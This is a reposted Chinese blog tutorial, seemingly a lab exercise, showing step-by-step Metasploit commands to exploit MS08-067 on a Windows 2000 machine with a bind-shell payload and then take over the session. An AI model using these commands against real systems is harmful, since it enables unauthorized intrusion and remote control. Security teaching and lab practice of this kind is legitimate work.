开发者社区> 技术小哥哥> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

Kali linux 2016.2(Rolling)的利用MSF攻击windows小案例(exploits + payloads + taegets)(博主推荐)

简介:
+关注继续查看

 本博文举的例,是利用远程溢出windows服务器。

   Exploit/windows/smb/ms08_067_netapi。

   Payload :    windows/shell/bind_tcp

  Target:  windows 2000

  

 

 

  以下是受害者机器情况。

 

 

 

 

 

 

 

 

 

   以下是攻击者机器

 

 

 

 

 

 

 

 

 

   这是show  exploits

 

 

 

   use   exploit/windows/smb/ms08_067_netapi

 

 

 

 

 

 

   以下是show payloads

 

 

 

 

 

   set  PAYLOAD   windows/shell/bind_tcp

 

 

 

 

 

   set   RHOSt    192.168.0.15

 

 

 

 

 

   show  targets

 

    如果将targets什么都不设置,或者设置为0的话,它就是自动探测。

 

 

 

 

   即,此刻,就是已经成功攻下了受害者机器。

  然后,做我们想要做的事情了。

 

 

 

 

 

   它会将我们从攻击者到受害者机器,的这一过程建议一个会话。在后台。

    通过session来查看。

  通过session -h来查看session命令的使用。

 

  

  一般用session -i  编号来切入到会话。

 

 

 

 

 

 

 

 

 

 

 

 

  总结  exploits + payloads + taegets

1、连接到远程系统的漏洞端口

2、交换协议序列直到到达漏洞触发点

3、注入利用代码,其中包含了直接或间接的修改

  返回地址为我们payload的指令以及nop指令,这增加了我们的代码被执行的机会。

4、 后续利用,可以是在受害主机上绑定任意端口的命令提示符或一个已经被创建的用户连接到远程系统或可能是一个GUI客户端连接到远程系统

 



本文转自大数据躺过的坑博客园博客,原文链接:http://www.cnblogs.com/zlslch/p/6891406.html,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
EvilAbigail - 自动化Linux的恶意攻击
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396430 ...
859 0
linux中cat、more、less命令区别详解
众所周知linux中命令cat、more、less均可用来查看文件内容,主要区别有:cat是一次性显示整个文件的内容,还可以将多个文件连接起来显示,它常与重定向符号配合使用,适用于文件内容少的情况;more和less一般用于显示文件内容超过一屏的内容,并且提供翻页的功能。
1947 0
linux命令之 ifconfig
<p style="margin: 0pt auto; padding-top: 0px; padding-bottom: 0px; text-indent: 21pt; color: rgb(51, 51, 51); font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px; line-height: 23px;"
1883 0
linux date命令
date +%Y   四位数年    %y   两位数年 ${date}   变量引用
951 0
Linux tree命令
Linux tree命令用于以树状图列出目录的内容。 执行tree指令,它会列出指定目录下的所有文件,包括子目录里的文件。 语法 tree [-aACdDfFgilnNpqstux][-I ][-P ][目录...] 参数说明: -a 显示所有文件和目录。
800 0
2010
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载